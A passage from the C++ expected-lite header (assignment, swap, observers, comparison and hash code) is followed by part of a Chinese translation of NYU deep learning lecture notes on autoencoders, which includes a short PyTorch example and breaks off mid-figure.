expected & operator=( nonstd::unexpected_type<G> const & error )
{
expected( unexpect, error.value() ).swap( *this );
return *this;
}
template< typename G
nsel_REQUIRES_T(
std::is_move_constructible<E>::value // TODO: std::is_nothrow_move_constructible<E>
&& std::is_move_assignable<E>::value
)
>
expected & operator=( nonstd::unexpected_type<G> && error )
{
expected( unexpect, std::move( error.value() ) ).swap( *this );
return *this;
}
template< typename... Args
nsel_REQUIRES_T(
std::is_nothrow_constructible<T, Args&&...>::value
)
>
value_type & emplace( Args &&... args )
{
expected( nonstd_lite_in_place(T), std::forward<Args>(args)... ).swap( *this );
return value();
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_nothrow_constructible<T, std::initializer_list<U>&, Args&&...>::value
)
>
value_type & emplace( std::initializer_list<U> il, Args &&... args )
{
expected( nonstd_lite_in_place(T), il, std::forward<Args>(args)... ).swap( *this );
return value();
}
// x.x.4.4 swap
template< typename U=T, typename G=E >
nsel_REQUIRES_R( void,
std17::is_swappable< U>::value
&& std17::is_swappable<G>::value
&& ( std::is_move_constructible<U>::value || std::is_move_constructible<G>::value )
)
swap( expected & other ) noexcept
(
std::is_nothrow_move_constructible<T>::value && std17::is_nothrow_swappable<T&>::value &&
std::is_nothrow_move_constructible<E>::value && std17::is_nothrow_swappable<E&>::value
)
{
using std::swap;
if ( bool(*this) && bool(other) ) { swap( contained.value(), other.contained.value() ); }
else if ( ! bool(*this) && ! bool(other) ) { swap( contained.error(), other.contained.error() ); }
else if ( bool(*this) && ! bool(other) ) { error_type t( std::move( other.error() ) );
other.contained.destruct_error();
other.contained.construct_value( std::move( contained.value() ) );
contained.destruct_value();
contained.construct_error( std::move( t ) );
bool has_value = contained.has_value();
bool other_has_value = other.has_value();
other.contained.set_has_value(has_value);
contained.set_has_value(other_has_value);
}
else if ( ! bool(*this) && bool(other) ) { other.swap( *this ); }
}
// x.x.4.5 observers
constexpr value_type const * operator ->() const
{
return assert( has_value() ), contained.value_ptr();
}
value_type * operator ->()
{
return assert( has_value() ), contained.value_ptr();
}
constexpr value_type const & operator *() const &
{
return assert( has_value() ), contained.value();
}
value_type & operator *() &
{
return assert( has_value() ), contained.value();
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr value_type const && operator *() const &&
{
return assert( has_value() ), std::move( contained.value() );
}
nsel_constexpr14 value_type && operator *() &&
{
return assert( has_value() ), std::move( contained.value() );
}
#endif
constexpr explicit operator bool() const noexcept
{
return has_value();
}
constexpr bool has_value() const noexcept
{
return contained.has_value();
}
constexpr value_type const & value() const &
{
return has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() );
}
value_type & value() &
{
return has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() );
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr value_type const && value() const &&
{
return std::move( has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() ) );
}
nsel_constexpr14 value_type && value() &&
{
return std::move( has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() ) );
}
#endif
constexpr error_type const & error() const &
{
return assert( ! has_value() ), contained.error();
}
error_type & error() &
{
return assert( ! has_value() ), contained.error();
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr error_type const && error() const &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
error_type && error() &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
#endif
constexpr unexpected_type get_unexpected() const
{
return make_unexpected( contained.error() );
}
template< typename Ex >
bool has_exception() const
{
using ContainedEx = typename std::remove_reference< decltype( get_unexpected().value() ) >::type;
return ! has_value() && std::is_base_of< Ex, ContainedEx>::value;
}
template< typename U
nsel_REQUIRES_T(
std::is_copy_constructible< T>::value
&& std::is_convertible<U&&, T>::value
)
>
value_type value_or( U && v ) const &
{
return has_value()
? contained.value()
: static_cast<T>( std::forward<U>( v ) );
}
template< typename U
nsel_REQUIRES_T(
std::is_move_constructible< T>::value
&& std::is_convertible<U&&, T>::value
)
>
value_type value_or( U && v ) &&
{
return has_value()
? std::move( contained.value() )
: static_cast<T>( std::forward<U>( v ) );
}
// unwrap()
// template <class U, class E>
// constexpr expected<U,E> expected<expected<U,E>,E>::unwrap() const&;
// template <class T, class E>
// constexpr expected<T,E> expected<T,E>::unwrap() const&;
// template <class U, class E>
// expected<U,E> expected<expected<U,E>, E>::unwrap() &&;
// template <class T, class E>
// template expected<T,E> expected<T,E>::unwrap() &&;
// factories
// template< typename Ex, typename F>
// expected<T,E> catch_exception(F&& f);
// template< typename F>
// expected<decltype(func(declval<T>())),E> map(F&& func) ;
// template< typename F>
// 'see below' bind(F&& func);
// template< typename F>
// expected<T,E> catch_error(F&& f);
// template< typename F>
// 'see below' then(F&& func);
private:
detail::storage_t
<
T
,E
, std::is_copy_constructible<T>::value && std::is_copy_constructible<E>::value
, std::is_move_constructible<T>::value && std::is_move_constructible<E>::value
>
contained;
};
/// class expected, void specialization
template< typename E >
class expected<void, E>
{
private:
template< typename, typename > friend class expected;
public:
using value_type = void;
using error_type = E;
using unexpected_type = nonstd::unexpected_type<E>;
// x.x.4.1 constructors
constexpr expected() noexcept
: contained( true )
{}
nsel_constexpr14 expected( expected const & other ) = default;
nsel_constexpr14 expected( expected && other ) = default;
constexpr explicit expected( nonstd_lite_in_place_t(void) )
: contained( true )
{}
template< typename G = E
nsel_REQUIRES_T(
!std::is_convertible<G const &, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( E{ error.value() } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_convertible<G const &, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( error.value() );
}
template< typename G = E
nsel_REQUIRES_T(
!std::is_convertible<G&&, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( E{ std::move( error.value() ) } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_convertible<G&&, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( std::move( error.value() ) );
}
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, Args&&... args )
: contained( false )
{
contained.emplace_error( std::forward<Args>( args )... );
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, std::initializer_list<U>, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, std::initializer_list<U> il, Args&&... args )
: contained( false )
{
contained.emplace_error( il, std::forward<Args>( args )... );
}
// destructor
~expected()
{
if ( ! has_value() )
{
contained.destruct_error();
}
}
// x.x.4.3 assignment
expected & operator=( expected const & other )
{
expected( other ).swap( *this );
return *this;
}
expected & operator=( expected && other ) noexcept
(
std::is_nothrow_move_assignable<E>::value &&
std::is_nothrow_move_constructible<E>::value )
{
expected( std::move( other ) ).swap( *this );
return *this;
}
void emplace()
{
expected().swap( *this );
}
// x.x.4.4 swap
template< typename G = E >
nsel_REQUIRES_R( void,
std17::is_swappable<G>::value
&& std::is_move_constructible<G>::value
)
swap( expected & other ) noexcept
(
std::is_nothrow_move_constructible<E>::value && std17::is_nothrow_swappable<E&>::value
)
{
using std::swap;
if ( ! bool(*this) && ! bool(other) ) { swap( contained.error(), other.contained.error() ); }
else if ( bool(*this) && ! bool(other) ) { contained.construct_error( std::move( other.error() ) );
bool has_value = contained.has_value();
bool other_has_value = other.has_value();
other.contained.set_has_value(has_value);
contained.set_has_value(other_has_value);
}
else if ( ! bool(*this) && bool(other) ) { other.swap( *this ); }
}
// x.x.4.5 observers
constexpr explicit operator bool() const noexcept
{
return has_value();
}
constexpr bool has_value() const noexcept
{
return contained.has_value();
}
void value() const
{
if ( ! has_value() )
{
error_traits<error_type>::rethrow( contained.error() );
}
}
constexpr error_type const & error() const &
{
return assert( ! has_value() ), contained.error();
}
error_type & error() &
{
return assert( ! has_value() ), contained.error();
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr error_type const && error() const &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
error_type && error() &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
#endif
constexpr unexpected_type get_unexpected() const
{
return make_unexpected( contained.error() );
}
template< typename Ex >
bool has_exception() const
{
using ContainedEx = typename std::remove_reference< decltype( get_unexpected().value() ) >::type;
return ! has_value() && std::is_base_of< Ex, ContainedEx>::value;
}
// template constexpr 'see below' unwrap() const&;
//
// template 'see below' unwrap() &&;
// factories
// template< typename Ex, typename F>
// expected<void,E> catch_exception(F&& f);
//
// template< typename F>
// expected<decltype(func()), E> map(F&& func) ;
//
// template< typename F>
// 'see below' bind(F&& func) ;
//
// template< typename F>
// expected<void,E> catch_error(F&& f);
//
// template< typename F>
// 'see below' then(F&& func);
private:
detail::storage_t
<
void
, E
, std::is_copy_constructible<E>::value
, std::is_move_constructible<E>::value
>
contained;
};
// x.x.4.6 expected<>: comparison operators
template< typename T1, typename E1, typename T2, typename E2 >
constexpr bool operator==( expected<T1,E1> const & x, expected<T2,E2> const & y )
{
return bool(x) != bool(y) ? false : bool(x) == false ? x.error() == y.error() : *x == *y;
}
template< typename T1, typename E1, typename T2, typename E2 >
constexpr bool operator!=( expected<T1,E1> const & x, expected<T2,E2> const & y )
{
return !(x == y);
}
template< typename E1, typename E2 >
constexpr bool operator==( expected<void,E1> const & x, expected<void,E1> const & y )
{
return bool(x) != bool(y) ? false : bool(x) == false ? x.error() == y.error() : true;
}
#if nsel_P0323R <= 2
template< typename T, typename E >
constexpr bool operator<( expected<T,E> const & x, expected<T,E> const & y )
{
return (!y) ? false : (!x) ? true : *x < *y;
}
template< typename T, typename E >
constexpr bool operator>( expected<T,E> const & x, expected<T,E> const & y )
{
return (y < x);
}
template< typename T, typename E >
constexpr bool operator<=( expected<T,E> const & x, expected<T,E> const & y )
{
return !(y < x);
}
template< typename T, typename E >
constexpr bool operator>=( expected<T,E> const & x, expected<T,E> const & y )
{
return !(x < y);
}
#endif
// x.x.4.7 expected: comparison with T
template< typename T1, typename E1, typename T2 >
constexpr bool operator==( expected<T1,E1> const & x, T2 const & v )
{
return bool(x) ? *x == v : false;
}
template< typename T1, typename E1, typename T2 >
constexpr bool operator==(T2 const & v, expected<T1,E1> const & x )
{
return bool(x) ? v == *x : false;
}
template< typename T1, typename E1, typename T2 >
constexpr bool operator!=( expected<T1,E1> const & x, T2 const & v )
{
return bool(x) ? *x != v : true;
}
template< typename T1, typename E1, typename T2 >
constexpr bool operator!=( T2 const & v, expected<T1,E1> const & x )
{
return bool(x) ? v != *x : true;
}
#if nsel_P0323R <= 2
template< typename T, typename E >
constexpr bool operator<( expected<T,E> const & x, T const & v )
{
return bool(x) ? *x < v : true;
}
template< typename T, typename E >
constexpr bool operator<( T const & v, expected<T,E> const & x )
{
return bool(x) ? v < *x : false;
}
template< typename T, typename E >
constexpr bool operator>( T const & v, expected<T,E> const & x )
{
return bool(x) ? *x < v : false;
}
template< typename T, typename E >
constexpr bool operator>( expected<T,E> const & x, T const & v )
{
return bool(x) ? v < *x : false;
}
template< typename T, typename E >
constexpr bool operator<=( T const & v, expected<T,E> const & x )
{
return bool(x) ? ! ( *x < v ) : false;
}
template< typename T, typename E >
constexpr bool operator<=( expected<T,E> const & x, T const & v )
{
return bool(x) ? ! ( v < *x ) : true;
}
template< typename T, typename E >
constexpr bool operator>=( expected<T,E> const & x, T const & v )
{
return bool(x) ? ! ( *x < v ) : false;
}
template< typename T, typename E >
constexpr bool operator>=( T const & v, expected<T,E> const & x )
{
return bool(x) ? ! ( v < *x ) : true;
}
#endif // nsel_P0323R
// x.x.4.8 expected: comparison with unexpected_type
template< typename T1, typename E1 , typename E2 >
constexpr bool operator==( expected<T1,E1> const & x, unexpected_type<E2> const & u )
{
return (!x) ? x.get_unexpected() == u : false;
}
template< typename T1, typename E1 , typename E2 >
constexpr bool operator==( unexpected_type<E2> const & u, expected<T1,E1> const & x )
{
return ( x == u );
}
template< typename T1, typename E1 , typename E2 >
constexpr bool operator!=( expected<T1,E1> const & x, unexpected_type<E2> const & u )
{
return ! ( x == u );
}
template< typename T1, typename E1 , typename E2 >
constexpr bool operator!=( unexpected_type<E2> const & u, expected<T1,E1> const & x )
{
return ! ( x == u );
}
#if nsel_P0323R <= 2
template< typename T, typename E >
constexpr bool operator<( expected<T,E> const & x, unexpected_type<E> const & u )
{
return (!x) ? ( x.get_unexpected() < u ) : false;
}
template< typename T, typename E >
constexpr bool operator<( unexpected_type<E> const & u, expected<T,E> const & x )
{
return (!x) ? ( u < x.get_unexpected() ) : true ;
}
template< typename T, typename E >
constexpr bool operator>( expected<T,E> const & x, unexpected_type<E> const & u )
{
return ( u < x );
}
template< typename T, typename E >
constexpr bool operator>( unexpected_type<E> const & u, expected<T,E> const & x )
{
return ( x < u );
}
template< typename T, typename E >
constexpr bool operator<=( expected<T,E> const & x, unexpected_type<E> const & u )
{
return ! ( u < x );
}
template< typename T, typename E >
constexpr bool operator<=( unexpected_type<E> const & u, expected<T,E> const & x)
{
return ! ( x < u );
}
template< typename T, typename E >
constexpr bool operator>=( expected<T,E> const & x, unexpected_type<E> const & u )
{
return ! ( u > x );
}
template< typename T, typename E >
constexpr bool operator>=( unexpected_type<E> const & u, expected<T,E> const & x )
{
return ! ( x > u );
}
#endif // nsel_P0323R
/// x.x.x Specialized algorithms
template< typename T, typename E
nsel_REQUIRES_T(
( std::is_void<T>::value || std::is_move_constructible<T>::value )
&& std::is_move_constructible<E>::value
&& std17::is_swappable<T>::value
&& std17::is_swappable<E>::value )
>
void swap( expected<T,E> & x, expected<T,E> & y ) noexcept ( noexcept ( x.swap(y) ) )
{
x.swap( y );
}
#if nsel_P0323R <= 3
template< typename T >
constexpr auto make_expected( T && v ) -> expected< typename std::decay<T>::type >
{
return expected< typename std::decay<T>::type >( std::forward<T>( v ) );
}
// expected<void> specialization:
auto inline make_expected() -> expected<void>
{
return expected<void>( in_place );
}
template< typename T >
constexpr auto make_expected_from_current_exception() -> expected<T>
{
return expected<T>( make_unexpected_from_current_exception() );
}
template< typename T >
auto make_expected_from_exception( std::exception_ptr v ) -> expected<T>
{
return expected<T>( unexpected_type<std::exception_ptr>( std::forward<std::exception_ptr>( v ) ) );
}
template< typename T, typename E >
constexpr auto make_expected_from_error( E e ) -> expected<T, typename std::decay<E>::type>
{
return expected<T, typename std::decay<E>::type>( make_unexpected( e ) );
}
template< typename F
nsel_REQUIRES_T( ! std::is_same<typename std::result_of<F()>::type, void>::value )
>
/*nsel_constexpr14*/
auto make_expected_from_call( F f ) -> expected< typename std::result_of<F()>::type >
{
try
{
return make_expected( f() );
}
catch (...)
{
return make_unexpected_from_current_exception();
}
}
template< typename F
nsel_REQUIRES_T( std::is_same<typename std::result_of<F()>::type, void>::value )
>
/*nsel_constexpr14*/
auto make_expected_from_call( F f ) -> expected<void>
{
try
{
f();
return make_expected();
}
catch (...)
{
return make_unexpected_from_current_exception();
}
}
#endif // nsel_P0323R
} // namespace expected_lite
using namespace expected_lite;
// using expected_lite::expected;
// using ...
} // namespace nonstd
namespace std {
// expected: hash support
template< typename T, typename E >
struct hash< nonstd::expected<T,E> >
{
using result_type = std::size_t;
using argument_type = nonstd::expected<T,E>;
constexpr result_type operator()(argument_type const & arg) const
{
return arg ? std::hash<T>{}(*arg) : result_type{};
}
};
// TBD - ?? remove? see spec.
template< typename T, typename E >
struct hash< nonstd::expected<T&,E> >
{
using result_type = std::size_t;
using argument_type = nonstd::expected<T&,E>;
constexpr result_type operator()(argument_type const & arg) const
{
return arg ? std::hash<T>{}(*arg) : result_type{};
}
};
// TBD - implement
// bool(e), hash<expected<void,E>>()(e) shall evaluate to the hashing true;
// otherwise it evaluates to an unspecified value if E is exception_ptr or
// a combination of hashing false and hash<E>()(e.error()).
template< typename E >
struct hash< nonstd::expected<void,E> >
{
};
} // namespace std
namespace nonstd {
// void unexpected() is deprecated && removed in C++17
#if nsel_CPP17_OR_GREATER || nsel_COMPILER_MSVC_VERSION > 141
template< typename E >
using unexpected = unexpected_type<E>;
#endif
} // namespace nonstd
#undef nsel_REQUIRES
#undef nsel_REQUIRES_0
#undef nsel_REQUIRES_T
nsel_RESTORE_WARNINGS()
#endif // nsel_USES_STD_EXPECTED
#endif // NONSTD_EXPECTED_LITE_HPP
| {
"pile_set_name": "Github"
} |
---
lang-ref: ch.07-3
title: 自动编码器的简介
lecturer: Alfredo Canziani
authors: Xinmeng Li, Atul Gandhi, Li Jiang, Xiao Li
date: 10 March 2020
lang: zh
translation-date: 20 June 2020
translator: Jonathan Sum
---
## [自动编码器的应用](https://www.youtube.com/watch?v=bggWQ14DD9M&t=55s)
### 图片生成
在图1,你可以去说出那一个脸对是假的吗?事实上,两个都是由StyleGan2生成器生成的。虽然脸部细节非常逼真,但背景看起来很奇怪(左:模糊,右: 这是因为那个神经网络由脸部样本来训练。背景就是十分易变。这里的数据流型是50维,等于人脸图像的自由度。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/1_faces_gen.jpg" height="150px" /><br>
<b>图1</b>: 生成的人脸
</center>
### 像素空間和潛在空間中插值的差異
<center>
<img src="{{site.baseurl}}/images/week07/07-3/2_dog.jpg" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/2_bird.jpg" height="120px"/>
<br>
<b>图2</b>: 狗和鸟
</center>
如果我们在狗和鸟的图像的像素空间之间进行线性插值,那我们就会在图3中看到有两幅图像淡入淡出。由上左方到下右方,狗的图像就消失,而鸟的图像就出现。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/3_dog2bird.jpg" height="200px"/><br>
<b>图3</b>: 插值后的结果
</center>
如果我们对两个潜在空间表示进行插值并将其输入到解码器,我们将会在图4中获得从狗到鸟的转换。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/4_model_d2b.jpg" height="200px"/><br>
<b>图4</b>: 如果我们对两个潜在空间表示进行插值并将其输入到解码器,我们将会在图4中获得从狗到鸟的转换。
</center>
明显然,潜在空间更适合取得图像的结构
### 转换实例
<center>
<img src="{{site.baseurl}}/images/week07/07-3/5_zoom1.jpg
" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/5_zoom2.jpg
" height="120px"/>
<br>
<b>图5</b>: 放大
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/6_shift1.jpg
" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/6_shift2.jpg
" height="120px"/>
<br>
<b>图6</b>: 移动
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/7_bright1.jpg
" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/7_bright2.jpg" height="120px"/>
<br>
<b>图7</b>: 亮度
</center>
<center>
<img src="{{site.baseurl}}/images/week07/07-3/8_rotation1.jpg" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/8_rotation2.jpg" height="120px"/>
<br>
<b>图8</b>: 转动(注意旋转可以是3D)
</center>
### 图像超级分辨率
该模型目的是放大图片同时重建原始脸孔图片。在图9由左到右,第一列是16x16图片,而第2部份是从标准的双三次插值中得到的,而第二部份是神经网路输出的,而其右边的是真实图片。 (https://github.com/david-gpu/srez)
<center><img src="{{site.baseurl}}/images/week07/07-3/9_reconstruct.jpg" height="120px"/>
<br>
<b>图9</b>: 重建原来的脸孔
</center>
由输出的图片中,我们可以看到训练数据中是有偏见,那会令重建的脸孔不准确。比如,上左方的亚洲人面孔在输出中变得像欧洲人,那是因为训用来训练的图像例子中的占比数量不平衡,而左下角女人的重建后的脸看起来很奇怪,那是因为训练图像例子中没有足够的图像有奇数角。
### 图像修补
<center>
<img src="{{site.baseurl}}/images/week07/07-3/10_facepatch.jpg" height="120px"/>
<br>
<b>图10</b>: 在脸上放上灰色的掩蔽
</center>
在脸上放上灰色的掩蔽如图10那样会令图片远离训练流形。而如图11那样重组是利用能量函数最小化在训练流形中找出最接近的样本图片。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/11_fixfacepatch.jpg" height="120px"/>
<br>
<b>图11</b>: <b>图10</b>的重建图像
</center>
### 由文字说明转成图片
<center>
<img src="{{site.baseurl}}/images/week07/07-3/12_caption.jpg" height="50px"/><img src="{{site.baseurl}}/images/week07/07-3/12_capimage.jpg" height="150px"/>
<br>
<b>图12</b>: 由文字说明转成图片
</center>
在图12中,由文字描述翻译成图片是由提取图片中一些文字性的重要视觉信息,然后转换它们成图片。
## [什么是自动编码器?](https://www.youtube.com/watch?v=bggWQ14DD9M&t=879s)
自动编码器是由无监督方式来训练的人工神经网络,它目的是先学习我们数据的编码式表示,然后由学习了的编码式表示来生成输入数据(尽可接近地)。所以,自动编码器的输出是预测它自身的输入。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/13_ae_structure.png" width="40%"/> <br>
<b>图13</b>: 基本自动编码器的架构<br>
</center>
图13显示出一个基本的自动编码器的架构。就如之前,我们由底部的输入 $\boldsymbol{x}$ 开始去输入到编码器( $\boldsymbol{W_h}$, followed by squashing). This results in the intermediate hidden layer $\boldsymbol{h}$. 定义的仿射变换,然后压缩),然后结果在于中间隐藏层 $\boldsymbol{W_x}$定义的仿射变换,然后压缩)。这生成输出 $\boldsymbol{\hat{x}}$,也就是我们模型的预测或对输入的重建。按照我们的惯例,我们说这是3层神经网路。
我们可以使用以下方程式来数学上表示上方的网络:
$$
\boldsymbol{h} = f(\boldsymbol{W_h}\boldsymbol{x} + \boldsymbol{b_h}) \\
\boldsymbol{\hat{x}} = g(\boldsymbol{W_x}\boldsymbol{h} + \boldsymbol{b_x})
$$
以下是我们所使用的维度:
$$
\boldsymbol{x},\boldsymbol{\hat{x}} \in \mathbb{R}^n\\
\boldsymbol{h} \in \mathbb{R}^d\\
\boldsymbol{W_h} \in \mathbb{R}^{d \times n}\\
\boldsymbol{W_x} \in \mathbb{R}^{n \times d}\\
$$
<b>注意:</b> 为了表示PCA,我们可以有一个很近的权重(或已经很近),如以下表示 $\boldsymbol{W_x}\ \dot{=}\ \boldsymbol{W_h}^\top$
上方的点上等号意思是大约等于或很近﹑很接近。
## 为什么我们用自动编码器?
现在,你或很惊愕为什么要预测出输出和自动编码器的应用会是什么。
自动编码器的主要的应用是检测出异常或图像降噪。你知道自动编码器能够对在数据流形中的数据进行数据重建。换句话说,当给予了一个数据流形,我们就希望那个自动编码器仅能够重构该流形中存在的输入。所以我们去限制模型去重建那些在训练中模型看过的事物,而且这样的话,如果有任何变异存在新的输入中,那些变异都会被移除,因为模型对这类干扰不敏感。
另一个自动编码的应用是图像压缩器。如果有一个输入后的层的维度是 $d$ ,而且低低于输入的维度 $n$,那编码器可用作压缩器「隐藏的表示」(以编码方式表示的表示)将处理输入中的所有(或大部分)信息,但用更少的空间。
## 重建损失
让我们看一下我们一般使用的重建损失。数据集的总损失为每个样本损失的平均值,也就是
$$
L = \frac{1}{m} \sum_{j=1}^m \ell(x^{(j)},\hat{x}^{(j)})
$$
当输入是分类的时,我们可以使用交叉熵损失来计算每个样本的损失,下方所示
$$
\ell(\boldsymbol{x},\boldsymbol{\hat{x}}) = -\sum_{i=1}^n [x_i \log(\hat{x}_i) + (1-x_i)\log(1-\hat{x}_i)]
$$
而且当输入是实值,我们或想使用「均方误差损失」,下方所示
$$
\ell(\boldsymbol{x},\boldsymbol{\hat{x}}) = \frac{1}{2} \lVert \boldsymbol{x} - \boldsymbol{\hat{x}} \rVert^2
$$
## 完成过度
当隐藏层的维数$d$是小于输入$n$的维数,那我们说这是低于完成不足的隐藏层。而且类似地,当$d>n$,我们称这为过度完成的隐藏层。图14显示出左方是一个未完成的隐藏层,而右方是过度完成的隐藏层。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/14_over_under_complete.png" width="60%"/> <br>
<b>图14</b>: 未完成与完全未完成的隐藏层<br>
</center>
就如上方讨论过的,一个未完成的隐藏层可以被用在压缩用途,比如我们去把输入编码当中的信息编码到在更少的维度上。另外一面,在过度完成层中,那就会把输入编码到比输入更高的维度。
由于我们正在尝试对输入进行重建,模型倾向于复制所有输入的特性到隐藏层,然后将其作为输出输出来,所有这只不过是和恒等函数没分别。这虽要避免,因为这意味着你的模型无法学习任东西。所以,我们虽要用「信息瓶颈information bottleneck」来加上一些约束。我们去约束隐藏层可以采用的格局到仅适用于训练期间看到的那些配置。这样就可以进行选择性重建(被限于输入空间的一个子集),而同时令模型更对所有不在流形中的东西更不敏感。
是可以看到的是「未完成层」是不能表现得如恒等函数一样,因为隐藏层的没有足够的维度来复制输入。所以「未完成隐藏层」和「过度完成隐藏层」比,它是不太会发生过度拟合问题,但它仍然可以发生过度拟合问题。比如,给予一个强大的编码器和一个解码器,模型简单地会将一个数字关联到每个数据点,同时这样地学会了映射。是有多个方法来避免过度拟合问题,比如正则化方法和架构法﹑其他方法。
## Denoising autoencoder
图15 显示了降噪自动编码器的流形及由看下图直觉地看出其工作原理。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/15_denoising_ae.png" width="500px" /><br>
<b>图15</b>: 降噪自动编码器(Denoising autoencoder)<br>
</center>
在这个模型,我们注入同样现实中我们将在现实中观察到的噪音分布(noisy distribution,就像一个数据点移开,如把正常声音弄成噪音一样,一个噪音分布或弄乱了的分布) ,所以我们可以学到如何稳健地恢复它。
由通过比较输入和输出,我们可以说出已经在流形中点没有移,而在点之外的移动了很多。
图16 给出了输入数据和输出数据之间的关系。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/16_relation1.png" width="350px" />
<img src="{{site.baseurl}}/images/week07/07-3/16_relation2.png" width="330px" />
<br>
<b>图16</b>: 降噪自动编码器的输入和输出<br>
</center>
我们也可以使用不同颜色去代表每一个点移动了的距离。图17显示了其图表。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/17_distance.png" width="500px" /><br>
<b>图17</b>: 测量输入数据的移动距离<br>
</center>
颜色越浅,移动了的距离就更远。由图表所看到的,我们可以说那些在角落的点移动了1个单位,而那些在两个分枝之间的没有移动过,那是因为它们在训练中被上方和下方的分支各自吸引着。
## 压缩式自动编码器
图18 显示出压缩式自动编码器的损失函数和其流形。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/18_contractive_ae.png" width="500px" /><br>
<b>图18</b>: 压缩式自动编码器 <br>
</center>
损失函数包含对「项」重行建进行,同时外加对应输入的隐藏表示的梯度的平方范数(squared norm of the gradient of the hidden representation with respect to the input)。因此,在输入变化的情况下,总损失将最小化隐藏层的变化。好处就是模型就会对重建目标而要走的方向感到敏感,同时不会对其化方向有敏感。图19显示了这些自动编码器的总体工作方式。
图19显示了这些自动编码器的总体工作方式。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/19_basic_ae.png" width="500px" /><br>
<b>图19</b>: 基本自动编码器 <br>
</center>
训练流形是一个单独有维度性的三维物体。而 $\boldsymbol{x}\in \boldsymbol{X}\subseteq\mathbb{R}^{n}$,自动编码器的目标是对卷曲线以一个方式来向下伸展或向内伸展,而$\boldsymbol{z}\in \boldsymbol{Z}\subseteq\mathbb{R}^{d}$。结果是,一个来自于输入层的点会被转成一个在潜在层的1点。现在,我们就有输入空间中的点和潜在空间中的点之间的对应性,但我们没有输入空间的区域和潜在空间的区域之间的对应性。之后,我们用解码器把潜在空间的一个点转换来生成一个有用的输出层。
## [实现自动编码器 - Notebook](https://www.youtube.com/watch?v=bggWQ14DD9M&t=2491s)
Jupyter笔记本可以在[这里找到。](https://github.com/Atcold/pytorch-Deep-Learning/blob/master/10-autoencoder.ipynb).
在这个笔记本中,我们将实现一个标准的自动编码器和降噪自动编码器,然后去比较它们的输出。
### 定义自动编码器模型架构和重建损失
使用大小为 $28 \times 28$ 图片,和30维的隐藏层。转换程序就会是由 $784\to30\to784$. 。如果使用双曲正切目标函数(hyperbolic tangent function )在编码器和解码器的转换程序之中,那我们就能够将输出范围限制为$(-1,1)$。均方误差损失(Mean Squared Error loss)会在模型中被作为损失函数来使用。
```python=
class Autoencoder(nn.Module):
def __init__(self):
super().__init__()
self.encoder = nn.Sequential(
nn.Linear(n, d),
nn.Tanh(),
)
self.decoder = nn.Sequential(
nn.Linear(d, n),
nn.Tanh(),
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
model = Autoencoder().to(device)
criterion = nn.MSELoss()
```
### 训练标准的自动编码器
去使用PyTorch训练一个标准的自动编码器,你要用接下来五个方法在训练循环中:
#### 向前:
1) 给模型输入图片,那就要用上这个: `output = model(img)` 。 <br>
2) 比较损失,就用这个: `criterion(output, img.data)`。
#### 向后:
3) 清理梯度来确保我们没有积累其值,那就要用上这个: `optimizer.zero_grad()`。 <br>
4) 反向传播,用这个:`loss.backward()`<br>
5) 向后退一步: `optimizer.step()`
图20 显示了标准自动编码器的输出。
<center>
<img src="{{site.baseurl}}/images/week07/07-3/21_output_stae.png" width="500px" /><br>
<b>图20</b>: 标准的自动编码器的输出 <br>
</center>
<br/>
### 训练降噪自动编码器
要对自动编码器进行降噪,您需要添加以下步骤:<br>
1) 叫 `nn.Dropout()` 来随机关闭一些神经元。 <br>
2) 创建掩盖型噪音: `do(torch.ones(img.shape))`。<br>
3) 把好图片乘「二进制掩盖码binary masks」来创建一个坏了的图片: `img_bad = (img * noise).to(device)`。
图21 示出了降噪自动编码器的输出。
<center>
